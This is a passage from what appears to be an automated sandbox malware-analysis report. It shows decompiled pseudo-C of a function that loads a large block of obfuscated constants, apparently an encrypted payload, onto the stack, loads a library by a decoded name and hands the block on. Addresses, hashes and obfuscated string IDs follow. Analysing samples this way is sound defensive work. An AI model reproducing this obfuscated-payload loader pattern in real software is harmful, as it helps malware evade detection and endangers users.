                  				intOrPtr _v948;
                  				intOrPtr _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				intOrPtr _v964;
                  				intOrPtr _v968;
                  				intOrPtr _v972;
                  				intOrPtr _v976;
                  				intOrPtr _v980;
                  				intOrPtr _v984;
                  				intOrPtr _v988;
                  				intOrPtr _v992;
                  				intOrPtr _v996;
                  				intOrPtr _v1000;
                  				intOrPtr _v1004;
                  				intOrPtr _v1008;
                  				intOrPtr _v1012;
                  				intOrPtr _v1016;
                  				intOrPtr _v1020;
                  				intOrPtr _v1024;
                  				intOrPtr _v1028;
                  				intOrPtr _v1032;
                  				intOrPtr _v1036;
                  				intOrPtr _v1040;
                  				intOrPtr _v1044;
                  				intOrPtr _v1048;
                  				intOrPtr _v1052;
                  				intOrPtr _v1056;
                  				intOrPtr _v1060;
                  				intOrPtr _v1064;
                  				intOrPtr _v1068;
                  				intOrPtr _v1072;
                  				intOrPtr _v1076;
                  				intOrPtr _v1080;
                  				intOrPtr _v1084;
                  				intOrPtr _v1088;
                  				intOrPtr _v1092;
                  				intOrPtr _v1096;
                  				intOrPtr _v1100;
                  				intOrPtr _v1104;
                  				intOrPtr _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				intOrPtr _v1120;
                  				intOrPtr _v1124;
                  				intOrPtr _v1128;
                  				intOrPtr _v1132;
                  				intOrPtr _v1136;
                  				intOrPtr _v1140;
                  				intOrPtr _v1144;
                  				intOrPtr _v1148;
                  				intOrPtr _v1152;
                  				intOrPtr _v1156;
                  				intOrPtr _v1160;
                  				intOrPtr _v1164;
                  				intOrPtr _v1168;
                  				intOrPtr _v1172;
                  				intOrPtr _v1176;
                  				intOrPtr _v1180;
                  				intOrPtr _v1184;
                  				intOrPtr _v1188;
                  				intOrPtr _v1192;
                  				intOrPtr _v1196;
                  				intOrPtr _v1200;
                  				intOrPtr _v1204;
                  				intOrPtr _v1208;
                  				intOrPtr _v1212;
                  				intOrPtr _v1216;
                  				intOrPtr _v1220;
                  				intOrPtr _v1224;
                  				intOrPtr _v1228;
                  				intOrPtr _v1232;
                  				intOrPtr _v1236;
                  				intOrPtr _v1240;
                  				intOrPtr _v1244;
                  				intOrPtr _v1248;
                  				intOrPtr _v1252;
                  				intOrPtr _v1256;
                  				intOrPtr _v1260;
                  				intOrPtr _v1264;
                  				intOrPtr _v1268;
                  				intOrPtr _v1272;
                  				intOrPtr _v1276;
                  				intOrPtr _v1280;
                  				intOrPtr _v1284;
                  				intOrPtr _v1288;
                  				intOrPtr _v1292;
                  				intOrPtr _v1296;
                  				intOrPtr _v1300;
                  				intOrPtr _v1304;
                  				intOrPtr _v1308;
                  				intOrPtr _v1312;
                  				intOrPtr _v1316;
                  				intOrPtr _v1320;
                  				intOrPtr _v1324;
                  				intOrPtr _v1328;
                  				intOrPtr _v1332;
                  				intOrPtr _v1336;
                  				intOrPtr _v1340;
                  				intOrPtr _v1344;
                  				intOrPtr _v1348;
                  				intOrPtr _v1352;
                  				intOrPtr _v1356;
                  				intOrPtr _v1360;
                  				intOrPtr _v1364;
                  				intOrPtr _v1368;
                  				intOrPtr _v1372;
                  				intOrPtr _v1376;
                  				intOrPtr _v1380;
                  				intOrPtr _v1384;
                  				intOrPtr _v1388;
                  				intOrPtr _v1392;
                  				intOrPtr _v1396;
                  				intOrPtr _v1400;
                  				intOrPtr _v1404;
                  				intOrPtr _v1408;
                  				intOrPtr _v1412;
                  				intOrPtr _v1416;
                  				intOrPtr _v1420;
                  				intOrPtr _v1424;
                  				intOrPtr _v1428;
                  				intOrPtr _v1432;
                  				intOrPtr _v1436;
                  				intOrPtr _v1440;
                  				intOrPtr _v1444;
                  				intOrPtr _v1448;
                  				intOrPtr _v1452;
                  				intOrPtr _v1456;
                  				intOrPtr _v1460;
                  				intOrPtr _v1464;
                  				intOrPtr _v1468;
                  				intOrPtr _v1472;
                  				intOrPtr _v1476;
                  				intOrPtr _v1480;
                  				intOrPtr _v1484;
                  				intOrPtr _v1488;
                  				intOrPtr _v1492;
                  				intOrPtr _v1496;
                  				intOrPtr _v1500;
                  				intOrPtr _v1504;
                  				intOrPtr _v1508;
                  				intOrPtr _v1512;
                  				intOrPtr _v1516;
                  				intOrPtr _v1520;
                  				intOrPtr _v1524;
                  				intOrPtr _v1528;
                  				intOrPtr _v1532;
                  				intOrPtr _v1536;
                  				intOrPtr _v1540;
                  				intOrPtr _v1544;
                  				intOrPtr _v1548;
                  				intOrPtr _v1552;
                  				intOrPtr _v1556;
                  				intOrPtr _v1560;
                  				intOrPtr _v1564;
                  				intOrPtr _v1568;
                  				intOrPtr _v1572;
                  				intOrPtr _v1576;
                  				intOrPtr _v1580;
                  				intOrPtr _v1584;
                  				intOrPtr _v1588;
                  				intOrPtr _v1592;
                  				intOrPtr _v1596;
                  				intOrPtr _v1600;
                  				intOrPtr _v1604;
                  				intOrPtr _v1608;
                  				intOrPtr _v1612;
                  				intOrPtr _v1616;
                  				intOrPtr _v1620;
                  				intOrPtr _v1624;
                  				intOrPtr _v1628;
                  				intOrPtr _v1632;
                  				intOrPtr _v1636;
                  				intOrPtr _v1640;
                  				intOrPtr _v1644;
                  				intOrPtr _v1648;
                  				intOrPtr _v1652;
                  				intOrPtr _v1656;
                  				intOrPtr _v1660;
                  				intOrPtr _v1664;
                  				intOrPtr _v1668;
                  				intOrPtr _v1672;
                  				intOrPtr _v1676;
                  				intOrPtr _v1680;
                  				intOrPtr _v1684;
                  				intOrPtr _v1688;
                  				intOrPtr _v1692;
                  				intOrPtr _v1696;
                  				intOrPtr _v1700;
                  				intOrPtr _v1704;
                  				intOrPtr _v1708;
                  				intOrPtr _v1712;
                  				intOrPtr _v1716;
                  				intOrPtr _v1720;
                  				intOrPtr _v1724;
                  				intOrPtr _v1728;
                  				intOrPtr _v1732;
                  				intOrPtr _v1736;
                  				intOrPtr _v1740;
                  				intOrPtr _v1744;
                  				intOrPtr _v1748;
                  				intOrPtr _v1752;
                  				intOrPtr _v1756;
                  				intOrPtr _v1760;
                  				intOrPtr _v1764;
                  				intOrPtr _v1768;
                  				intOrPtr _v1772;
                  				intOrPtr _v1776;
                  				intOrPtr _v1780;
                  				intOrPtr _v1784;
                  				intOrPtr _v1788;
                  				intOrPtr _v1792;
                  				intOrPtr _v1796;
                  				intOrPtr _v1800;
                  				intOrPtr _v1804;
                  				intOrPtr _v1808;
                  				intOrPtr _v1812;
                  				intOrPtr _v1816;
                  				intOrPtr _v1820;
                  				intOrPtr _v1824;
                  				intOrPtr _v1828;
                  				intOrPtr _v1832;
                  				intOrPtr _v1836;
                  				intOrPtr _v1840;
                  				intOrPtr _v1844;
                  				intOrPtr _v1848;
                  				intOrPtr _v1852;
                  				intOrPtr _v1856;
                  				intOrPtr _v1860;
                  				intOrPtr _v1864;
                  				intOrPtr _v1868;
                  				intOrPtr _v1872;
                  				intOrPtr _v1876;
                  				intOrPtr _v1880;
                  				intOrPtr _v1884;
                  				char _v1888;
                  				struct HINSTANCE__* _t474;
                  
                  				_v1888 = 0xa41c4ed0;
                  				_v1884 = 0x1a33c848;
                  				_v1880 = 0xf78674dd;
                  				_v1876 = 0x4d35aed;
                  				_v1872 = 0x5597c7b0;
                  				_v1868 = 0xb0ef52b0;
                  				_v1864 = 0x9b5bf2a7;
                  				_v1860 = 0xbf81a217;
                  				_v1856 = 0x3adcb09b;
                  				_v1852 = 0xe8ac849c;
                  				_v1848 = 0x57b96c20;
                  				_v1844 = 0xcd9f7235;
                  				_v1840 = 0xf420170d;
                  				_v1836 = 0x14cdf27a;
                  				_v1832 = 0xfd5eb0fb;
                  				_v1828 = 0x39318b65;
                  				_v1824 = 0x65d03115;
                  				_v1820 = 0x95260aff;
                  				_v1816 = 0x2e67c28e;
                  				_v1812 = 0xa1f4a8f4;
                  				_v1808 = 0xc812f1ab;
                  				_v1804 = 0xd934dc9c;
                  				_v1800 = 0xa4e6685;
                  				_v1796 = 0xfe213c23;
                  				_v1792 = 0x43c6d29;
                  				_v1788 = 0xcf12bcb8;
                  				_v1784 = 0x9f98cc3;
                  				_v1780 = 0xa1b2d167;
                  				_v1776 = 0x7fad3c40;
                  				_v1772 = 0xa80d3c34;
                  				_v1768 = 0xc8f714d7;
                  				_v1764 = 0x671d7785;
                  				_v1760 = 0x4a0ac7c8;
                  				_v1756 = 0x21c03928;
                  				_v1752 = 0x4555c0d0;
                  				_v1748 = 0x9834af68;
                  				_v1744 = 0xc6d9895d;
                  				_v1740 = 0xda921464;
                  				_v1736 = 0x6b089d64;
                  				_v1732 = 0xfec570b;
                  				_v1728 = 0xc3626a82;
                  				_v1724 = 0xd34a14be;
                  				_v1720 = 0xb7eabcaf;
                  				_v1716 = 0x281b3387;
                  				_v1712 = 0xcabf350d;
                  				_v1708 = 0x207d4223;
                  				_v1704 = 0xbc0cb804;
                  				_v1700 = 0xdefac10b;
                  				_v1696 = 0x679df176;
                  				_v1692 = 0x6390c0b9;
                  				_v1688 = 0x817bdef2;
                  				_v1684 = 0xcb119739;
                  				_v1680 = 0xd62a3fcf;
                  				_v1676 = 0x5b6539ee;
                  				_v1672 = 0x2ebc383e;
                  				_v1668 = 0xf6595eaa;
                  				_v1664 = 0xe1fa3158;
                  				_v1660 = 0xd81c642d;
                  				_v1656 = 0x5b3ff5b2;
                  				_v1652 = 0x25dcb5f4;
                  				_v1648 = 0xb74a4541;
                  				_v1644 = 0x65280c6a;
                  				_v1640 = 0x507410e2;
                  				_v1636 = 0x162eb7ae;
                  				_v1632 = 0x983fe17e;
                  				_v1628 = 0x1dce09e5;
                  				_v1624 = 0x20a01932;
                  				_v1620 = 0xf8c2ec13;
                  				_v1616 = 0xd03324ad;
                  				_v1612 = 0xdda4a81a;
                  				_v1608 = 0xefe7666e;
                  				_v1604 = 0x3499fe41;
                  				_v1600 = 0xfef05481;
                  				_v1596 = 0x4379be19;
                  				_v1592 = 0xac2a8a8c;
                  				_v1588 = 0xaa65ea73;
                  				_v1584 = 0x780f71c2;
                  				_v1580 = 0xbc7e1592;
                  				_v1576 = 0xb46dbbf2;
                  				_v1572 = 0x7f4481aa;
                  				_v1568 = 0x4c400fc5;
                  				_v1564 = 0xd0e27c84;
                  				_v1560 = 0xa0e4f48d;
                  				_v1556 = 0x608f4f65;
                  				_v1552 = 0x81e08196;
                  				_v1548 = 0x12e25f1;
                  				_v1544 = 0x108b753a;
                  				_v1540 = 0x734d6144;
                  				_v1536 = 0x2099d367;
                  				_v1532 = 0x4af859b5;
                  				_v1528 = 0x64274aa4;
                  				_v1524 = 0xd77c3180;
                  				_v1520 = 0xd07c56cd;
                  				_v1516 = 0x63b940a8;
                  				_v1512 = 0xdefbc07f;
                  				_v1508 = 0x1ed0b183;
                  				_v1504 = 0x946279a2;
                  				_v1500 = 0x1b4e182;
                  				_v1496 = 0xbd9e9d5e;
                  				_v1492 = 0xf895b090;
                  				_v1488 = 0x83ef7189;
                  				_v1484 = 0xdb6fdda0;
                  				_v1480 = 0xc43f2288;
                  				_v1476 = 0xfa2ee974;
                  				_v1472 = 0xad630715;
                  				_v1468 = 0x6e3f94ea;
                  				_v1464 = 0xc210224a;
                  				_v1460 = 0x5e42620a;
                  				_v1456 = 0xbdc03864;
                  				_v1452 = 0xfa898059;
                  				_v1448 = 0x5b223206;
                  				_v1444 = 0xe6ee380f;
                  				_v1440 = 0xe9c024a5;
                  				_v1436 = 0x795a214e;
                  				_v1432 = 0xf661e49b;
                  				_v1428 = 0x5d53c5b6;
                  				_v1424 = 0xe92e65b3;
                  				_v1420 = 0xe7f485b4;
                  				_v1416 = 0xe34b82e0;
                  				_v1412 = 0xaac6e570;
                  				_v1408 = 0xd3519085;
                  				_v1404 = 0x9d031edf;
                  				_v1400 = 0x16517768;
                  				_v1396 = 0x6b60337c;
                  				_v1392 = 0x87f162f5;
                  				_v1388 = 0x30b72081;
                  				_v1384 = 0xaf9664d7;
                  				_v1380 = 0xd1c1388f;
                  				_v1376 = 0xbaeca29b;
                  				_v1372 = 0x2614ddd9;
                  				_v1368 = 0xfd4ce0b1;
                  				_v1364 = 0x5c9c68b7;
                  				_v1360 = 0x2676eff1;
                  				_v1356 = 0x3d50e3a3;
                  				_v1352 = 0x53c809b1;
                  				_v1348 = 0x2d212e3b;
                  				_v1344 = 0x84a1010a;
                  				_v1340 = 0xafe995ff;
                  				_v1336 = 0x624ecd4e;
                  				_v1332 = 0xa0b9de9d;
                  				_v1328 = 0xf70d11ba;
                  				_v1324 = 0xe13ac65e;
                  				_v1320 = 0x94330fb1;
                  				_v1316 = 0x4ba9883c;
                  				_v1312 = 0xf9b4aa94;
                  				_v1308 = 0x1528153;
                  				_v1304 = 0xab11f915;
                  				_v1300 = 0xf65a3f7d;
                  				_v1296 = 0xf416523f;
                  				_v1292 = 0x622e2452;
                  				_v1288 = 0xe7dd6fea;
                  				_v1284 = 0xc53292c3;
                  				_v1280 = 0x341cfd;
                  				_v1276 = 0x1bf5cfa4;
                  				_v1272 = 0x3d6d8fc5;
                  				_v1268 = 0x882e2a5d;
                  				_v1264 = 0xf4dab66;
                  				_v1260 = 0x879777e1;
                  				_v1256 = 0x4235fa33;
                  				_v1252 = 0xf7412f63;
                  				_v1248 = 0x744366b8;
                  				_v1244 = 0x5d79780f;
                  				_v1240 = 0x33df1776;
                  				_v1236 = 0xa6b205d3;
                  				_v1232 = 0x7f6a7839;
                  				_v1228 = 0x671dbdce;
                  				_v1224 = 0xedb53a4e;
                  				_v1220 = 0x7885bf0f;
                  				_v1216 = 0x5d5e08dc;
                  				_v1212 = 0xe0da0cb9;
                  				_v1208 = 0x72626c3b;
                  				_v1204 = 0xf7523beb;
                  				_v1200 = 0xd3cbf7c0;
                  				_v1196 = 0xf397c375;
                  				_v1192 = 0xe8e0e8b8;
                  				_v1188 = 0xda2713ea;
                  				_v1184 = 0x61e812b;
                  				_v1180 = 0x1f5e76ae;
                  				_v1176 = 0xfcc0fd26;
                  				_v1172 = 0xa4f96784;
                  				_v1168 = 0xdfc74366;
                  				_v1164 = 0x4770325;
                  				_v1160 = 0xfcfb039;
                  				_v1156 = 0xbb5cd5be;
                  				_v1152 = 0x835bb17f;
                  				_v1148 = 0x45f03008;
                  				_v1144 = 0x8157471b;
                  				_v1140 = 0x92daa034;
                  				_v1136 = 0xc4415ba2;
                  				_v1132 = 0x1b6c5a77;
                  				_v1128 = 0x7e366518;
                  				_v1124 = 0x83ab0c1d;
                  				_v1120 = 0x397b67c4;
                  				_v1116 = 0xbf8a7d;
                  				_v1112 = 0x2e52b5be;
                  				_v1108 = 0x4c915e05;
                  				_v1104 = 0x3753c1d6;
                  				_v1100 = 0x95d39f06;
                  				_v1096 = 0x3d258823;
                  				_v1092 = 0x3608b8f8;
                  				_v1088 = 0xb4fbe8a7;
                  				_v1084 = 0x4c3e8f06;
                  				_v1080 = 0xe8794991;
                  				_v1076 = 0xdccaeb41;
                  				_v1072 = 0x9e236e45;
                  				_v1068 = 0xc17af71c;
                  				_v1064 = 0x4e7519a6;
                  				_v1060 = 0xc27014cc;
                  				_v1056 = 0x4d83d065;
                  				_v1052 = 0x6af34f37;
                  				_v1048 = 0xcd08d804;
                  				_v1044 = 0x3d730bc7;
                  				_v1040 = 0x21e8c57d;
                  				_v1036 = 0x317420d4;
                  				_v1032 = 0x6ebcf6dd;
                  				_v1028 = 0x7247c452;
                  				_v1024 = 0x690e32a5;
                  				_v1020 = 0x265b9d09;
                  				_v1016 = 0xef460e82;
                  				_v1012 = 0xbd38bc0;
                  				_v1008 = 0xce8b0c3b;
                  				_v1004 = 0x87b18560;
                  				_v1000 = 0x923ada08;
                  				_v996 = 0x7954f0df;
                  				_v992 = 0x59d4296d;
                  				_v988 = 0x598866b0;
                  				_v984 = 0x5ebed584;
                  				_v980 = 0x75f303ed;
                  				_v976 = 0x4bd185df;
                  				_v972 = 0x90668e75;
                  				_v968 = 0xef0ec6ee;
                  				_v964 = 0xfb160c3c;
                  				_v960 = 0xdddf860c;
                  				_v956 = 0xe3ec7c97;
                  				_v952 = 0xd84fe87a;
                  				_v948 = 0x4eebf6de;
                  				_v944 = 0x6598361e;
                  				_v940 = 0x2d4f37a9;
                  				_v936 = 0x20c189e8;
                  				_v932 = 0x1da649ac;
                  				_v928 = 0xbb2d17b0;
                  				_v924 = 0x7365b2a6;
                  				_v920 = 0x748039dd;
                  				_v916 = 0x40abf8ad;
                  				_v912 = 0xc2230aa3;
                  				_v908 = 0xddc9542f;
                  				_v904 = 0xd5cbbac;
                  				_v900 = 0x44de193b;
                  				_v896 = 0xe51fd5ad;
                  				_v892 = 0xf9739bdf;
                  				_v888 = 0xf511941f;
                  				_v884 = 0xbb4c8f97;
                  				_v880 = 0x71f29f4a;
                  				_v876 = 0xf93e7335;
                  				_v872 = 0xb3d5a235;
                  				_v868 = 0x8bf5639b;
                  				_v864 = 0xb678715c;
                  				_v860 = 0x1681d985;
                  				_v856 = 0xce6e3dde;
                  				_v852 = 0x5962f64c;
                  				_v848 = 0x1b0fea51;
                  				_v844 = 0xf304da7f;
                  				_v840 = 0x60dd60fc;
                  				_v836 = 0x4894e820;
                  				_v832 = 0xd4c5e951;
                  				_v828 = 0xbc0c6801;
                  				_v824 = 0x1b410e8d;
                  				_v820 = 0x9d4beae1;
                  				_v816 = 0xb4470101;
                  				_v812 = 0xefc6595c;
                  				_v808 = 0x1942297a;
                  				_v804 = 0x452f53c1;
                  				_v800 = 0x60736a8a;
                  				_v796 = 0x1cb5c8c2;
                  				_v792 = 0xa3b92496;
                  				_v788 = 0x3604e2c0;
                  				_v784 = 0x7d04dd0b;
                  				_v780 = 0xf93943b2;
                  				_v776 = 0xa34c9da0;
                  				_v772 = 0x16093c22;
                  				_v768 = 0x6230157f;
                  				_v764 = 0xf80a9182;
                  				_v760 = 0x9d202d62;
                  				_v756 = 0x58881b4d;
                  				_v752 = 0x7261191d;
                  				_v748 = 0xee6a2a6f;
                  				_v744 = 0x8b6ed692;
                  				_v740 = 0xf4ad89c5;
                  				_v736 = 0x902f328c;
                  				_v732 = 0xdae187c2;
                  				_v728 = 0x84c69aaf;
                  				_v724 = 0x8b583ddc;
                  				_v720 = 0x3154736a;
                  				_v716 = 0xf0ba94f8;
                  				_v712 = 0x371d3c0;
                  				_v708 = 0x9490ef0f;
                  				_v704 = 0x2d449fdf;
                  				_v700 = 0xb6d886dd;
                  				_v696 = 0x34ac4b5b;
                  				_v692 = 0x4add82f5;
                  				_v688 = 0x5643055a;
                  				_v684 = 0xedb6a896;
                  				_v680 = 0xf3b73e97;
                  				_v676 = 0xcd8bf45d;
                  				_v672 = 0x93a0ea35;
                  				_v668 = 0xf51d7bfd;
                  				_v664 = 0xd083f728;
                  				_v660 = 0x5978c810;
                  				_v656 = 0xacfb548d;
                  				_v652 = 0x681791b;
                  				_v648 = 0xab7f89b7;
                  				_v644 = 0x4f840277;
                  				_v640 = 0x45cf5527;
                  				_v636 = 0xafbc6fa5;
                  				_v632 = 0x7709f48f;
                  				_v628 = 0x8685cbd3;
                  				_v624 = 0x39eebbf5;
                  				_v620 = 0x5d1c8064;
                  				_v616 = 0x20fe1dce;
                  				_v612 = 0x69db75cc;
                  				_v608 = 0x9b65dc5a;
                  				_v604 = 0x27934866;
                  				_v600 = 0xf19b8bb6;
                  				_v596 = 0x887f0721;
                  				_v592 = 0x679fda8;
                  				_v588 = 0x78284a0;
                  				_v584 = 0x265fdb89;
                  				_v580 = 0x73ed0821;
                  				_v576 = 0x7d12f58b;
                  				_v572 = 0xc29cc904;
                  				_v568 = 0xf8cd14ad;
                  				_v564 = 0x5a59d9e2;
                  				_v560 = 0xa4ddcf31;
                  				_v556 = 0x91ce662e;
                  				_v552 = 0xc476dab;
                  				_v548 = 0xe8647b34;
                  				_v544 = 0x7a59bdcd;
                  				_v540 = 0xff29671e;
                  				_v536 = 0x37ab0d4d;
                  				_v532 = 0x3b7b2c58;
                  				_v528 = 0xdaca9837;
                  				_v524 = 0x5d95c73f;
                  				_v520 = 0x8d2d8ef2;
                  				_v516 = 0xe3a7eb3d;
                  				_v512 = 0x93410f8b;
                  				_v508 = 0x40690df9;
                  				_v504 = 0x56050e5c;
                  				_v500 = 0xdf7e7ef6;
                  				_v496 = 0xe57bff2d;
                  				_v492 = 0x8053dea3;
                  				_v488 = 0xca387b31;
                  				_v484 = 0x32eccb66;
                  				_v480 = 0xafb3b6b8;
                  				_v476 = 0x8f23f2d6;
                  				_v472 = 0x5fd00aa;
                  				_v468 = 0x7ba3d053;
                  				_v464 = 0xbed15460;
                  				_v460 = 0x91a7f84b;
                  				_v456 = 0x509deafe;
                  				_v452 = 0x8be07147;
                  				_v448 = 0x2a1903f7;
                  				_v444 = 0x74e13ee;
                  				_v440 = 0x46703439;
                  				_v436 = 0xf34281b8;
                  				_v432 = 0x88689edc;
                  				_v428 = 0xae06c319;
                  				_v424 = 0x809e0f7;
                  				_v420 = 0x32e2a63c;
                  				_v416 = 0x351aba4e;
                  				_v412 = 0x6bda9779;
                  				_v408 = 0xff25d6b;
                  				_v404 = 0xf19e2b12;
                  				_v400 = 0xe09ee902;
                  				_v396 = 0x30162918;
                  				_v392 = 0xf554291d;
                  				_v388 = 0xd293bf0c;
                  				_v384 = 0xa5aaa34d;
                  				_v380 = 0x18af0b32;
                  				_v376 = 0x45d3b443;
                  				_v372 = 0x8a8542bb;
                  				_v368 = 0xb2938f72;
                  				_v364 = 0x375b0514;
                  				_v360 = 0xa0175b99;
                  				_v356 = 0xab05d150;
                  				_v352 = 0xb2ab1a30;
                  				_v348 = 0xe6d1d6f1;
                  				_v344 = 0x5bc1d28d;
                  				_v340 = 0x31ab7862;
                  				_v336 = 0xb32f6993;
                  				_v332 = 0x3bff57b5;
                  				_v328 = 0xf4362081;
                  				_v324 = 0xa41ea41;
                  				_v320 = 0xf5554d12;
                  				_v316 = 0xe74be567;
                  				_v312 = 0xdda94f36;
                  				_v308 = 0x9942b8d7;
                  				_v304 = 0xa73018e6;
                  				_v300 = 0x65aa1921;
                  				_v296 = 0xa0ad1bda;
                  				_v292 = 0xfa54f506;
                  				_v288 = 0x36d533d2;
                  				_v284 = 0x2a17a738;
                  				_v280 = 0x24a73c55;
                  				_v276 = 0x25c6e7c;
                  				_v272 = 0x792542e6;
                  				_v268 = 0x60fe3e84;
                  				_v264 = 0xe894fa28;
                  				_v260 = 0xa8c3bd02;
                  				_v256 = 0xdec79a5c;
                  				_v252 = 0xaeea5367;
                  				_v248 = 0x9618cdf9;
                  				_v244 = 0x4d53bb98;
                  				_v240 = 0xc82415fb;
                  				_v236 = 0x311045a0;
                  				_v232 = 0x435d92ea;
                  				_v228 = 0x64d81a20;
                  				_v224 = 0x1a745c98;
                  				_v220 = 0xbb1cacab;
                  				_v216 = 0xb68b62f7;
                  				_v212 = 0x2262a170;
                  				_v208 = 0x244f7cd;
                  				_v204 = 0x634247e8;
                  				_v200 = 0x8e6f29ce;
                  				_v196 = 0xc125d02b;
                  				_v192 = 0xe1fb1246;
                  				_v188 = 0x90ff749d;
                  				_v184 = 0x9d49b7a9;
                  				_v180 = 0x8ae4cd18;
                  				_v176 = 0xdc3b0e33;
                  				_v172 = 0x5357343f;
                  				_v168 = 0x9078d775;
                  				_v164 = 0x7cd42af4;
                  				_v160 = 0x85875278;
                  				_v156 = 0xe098b691;
                  				_v152 = 0xdd539cbf;
                  				_v148 = 0x7b6915e6;
                  				_v144 = 0xdfa72c20;
                  				_v140 = 0x15af0b24;
                  				_v136 = 0x1e90183d;
                  				_v132 = 0xae2521d9;
                  				_v128 = 0x132fe8d2;
                  				_v124 = 0x7628aa01;
                  				_v120 = 0xf98981af;
                  				_v116 = 0xdeee782f;
                  				_v112 = 0x7ff5b8f;
                  				_v108 = 0x3a7c246a;
                  				_v104 = 0x8c6af67;
                  				_v100 = 0x27178fff;
                  				_v96 = 0x40ce6aac;
                  				_v92 = 0xe05cdea;
                  				_v88 = 0x1a09cd63;
                  				_v84 = 0x4ab557a2;
                  				_v80 = 0x578e6083;
                  				_v76 = 0x73ab4d0a;
                  				_v72 = 0x4577df03;
                  				_v68 = 0x388ee30c;
                  				_v64 = 0xa6a001f8;
                  				_v60 = 0xa362abb;
                  				_v56 = 0x4c361001;
                  				_v52 = 0x52b9ecf;
                  				_v48 = 0xf779ca4b;
                  				_v44 = 0xf0d67399;
                  				_v40 = 0x26e6d555;
                  				_v36 = 0xda742f2c;
                  				_v32 = 0x945c9d84;
                  				_v28 = 0x85b2d426;
                  				_v24 = 0x3e9987ee;
                  				_v20 = 0x9c588149;
                  				_v16 = 0x5b70fee9;
                  				_v12 = 0x724f6ac9;
                  				_v8 = 0x3e06e993;
                  				_t482 = E00401A52(0x412320, 0x72fc3a35);
                  				_t474 = LoadLibraryW(_t473); // executed
                  				 *0x4164ec = _t474;
                  				L00401B09(_t482);
                  				_push(0x414710);
                  				_push(0x81c5b25);
                  				return E004012FF( *0x4164ec,  &_v1888, 0x1d7);
                  			}
                  0x0040838c
                  0x00408396
                  0x004083a0
                  0x004083aa
                  0x004083b4
                  0x004083be
                  0x004083c8
                  0x004083d2
                  0x004083dc
                  0x004083e6
                  0x004083f0
                  0x004083fa
                  0x00408404
                  0x0040840e
                  0x00408418
                  0x00408422
                  0x0040842c
                  0x00408436
                  0x00408440
                  0x0040844a
                  0x00408454
                  0x0040845e
                  0x00408468
                  0x00408472
                  0x0040847c
                  0x00408486
                  0x00408490
                  0x0040849a
                  0x004084a4
                  0x004084ae
                  0x004084b8
                  0x004084c2
                  0x004084cc
                  0x004084d6
                  0x004084e0
                  0x004084ea
                  0x004084f4
                  0x004084fe
                  0x00408508
                  0x00408512
                  0x0040851c
                  0x00408526
                  0x00408530
                  0x0040853a
                  0x00408544
                  0x0040854e
                  0x00408558
                  0x00408562
                  0x0040856c
                  0x00408576
                  0x00408580
                  0x0040858a
                  0x00408594
                  0x0040859e
                  0x004085a8
                  0x004085b2
                  0x004085bc
                  0x004085c6
                  0x004085d0
                  0x004085da
                  0x004085e4
                  0x004085ee
                  0x004085f8
                  0x00408602
                  0x0040860c
                  0x00408616
                  0x00408620
                  0x0040862a
                  0x00408634
                  0x0040863e
                  0x00408648
                  0x00408652
                  0x0040865c
                  0x00408666
                  0x00408670
                  0x0040867a
                  0x00408684
                  0x0040868e
                  0x0040869d
                  0x004086ac
                  0x004086b6
                  0x004086c0
                  0x004086ca
                  0x004086d4
                  0x004086de
                  0x004086e8
                  0x004086f2
                  0x004086fc
                  0x00408706
                  0x00408710
                  0x0040871a
                  0x00408724
                  0x0040872e
                  0x00408738
                  0x00408742
                  0x0040874c
                  0x00408756
                  0x00408760
                  0x0040876a
                  0x00408774
                  0x0040877e
                  0x00408788
                  0x00408792
                  0x0040879c
                  0x004087a6
                  0x004087b0
                  0x004087ba
                  0x004087c4
                  0x004087ce
                  0x004087d8
                  0x004087e2
                  0x004087ec
                  0x004087f6
                  0x00408800
                  0x00408807
                  0x0040880e
                  0x00408815
                  0x0040881c
                  0x00408823
                  0x0040882a
                  0x00408831
                  0x00408838
                  0x0040883f
                  0x00408846
                  0x0040884d
                  0x00408854
                  0x0040885b
                  0x00408862
                  0x00408869
                  0x00408870
                  0x00408877
                  0x0040887e
                  0x00408885
                  0x0040888c
                  0x00408893
                  0x0040889a
                  0x004088a1
                  0x004088a8
                  0x004088af
                  0x004088b6
                  0x004088bd
                  0x004088c4
                  0x004088cb
                  0x004088d2
                  0x004088d9
                  0x004088e5
                  0x004088e8
                  0x004088f0
                  0x004088f5
                  0x00408906
                  0x0040890b
                  0x00408921

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 004088E8
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: bB^$#B} $4{d$94pF$;.!-$;lbr$?4WS$AA$DaMs$N!Zy$R$.b$X,{;$gK$j$|:$jsT1$nf$o*j$|3`k$9e[$B%y$GBc
                  • API String ID: 1029625771-3166147023
                  • Opcode ID: dd96afa55d8e9e932a96e5fe82667a6c913e1731f0611b2d86c11fa43710962e
                  • Instruction ID: 7dcabeb444d3c38dde185443b52466955599dc9d20e08e1f97c3b9dafdfd80e0
                  • Opcode Fuzzy Hash: dd96afa55d8e9e932a96e5fe82667a6c913e1731f0611b2d86c11fa43710962e
                  • Instruction Fuzzy Hash: 9B82B4F0C467698FDB618F429E8438EBA75BB51345F5096C9C29C3A204CB750BC2CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 83%
                  			E0040632A(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
